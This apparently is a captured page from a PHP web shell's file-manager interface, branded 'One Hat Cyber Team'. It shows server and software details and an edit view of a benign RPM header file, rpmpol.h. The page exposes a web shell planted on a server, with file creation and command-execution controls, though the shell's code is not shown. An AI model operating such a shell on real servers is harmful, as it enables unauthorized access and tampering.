One Hat Cyber Team
Your IP :
108.162.241.211
Server IP :
188.114.96.4
Server :
Linux thuru 6.5.11-4-pve #1 SMP PREEMPT_DYNAMIC PMX 6.5.11-4 (2023-11-20T10:19Z) x86_64
Server Software :
Apache/2.4.51 (Unix) OpenSSL/1.0.2k-fips
PHP Version :
7.3.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
include
/
rpm
/
Edit File:
rpmpol.h
#ifndef H_RPMPOL #define H_RPMPOL /** \ingroup rpmpol * \file lib/rpmpol.h * Structure(s) used for policy sets. */ #include <rpm/rpmtypes.h> #ifdef __cplusplus extern "C" { #endif enum rpmpolFlags_e { RPMPOL_FLAG_NONE = 0, RPMPOL_FLAG_BASE = (1 << 0) }; typedef rpmFlags rpmpolFlags; #define RPMPOL_TYPE_DEFAULT "default" #ifdef __cplusplus } #endif #endif /* H_rpmpol */
Simpan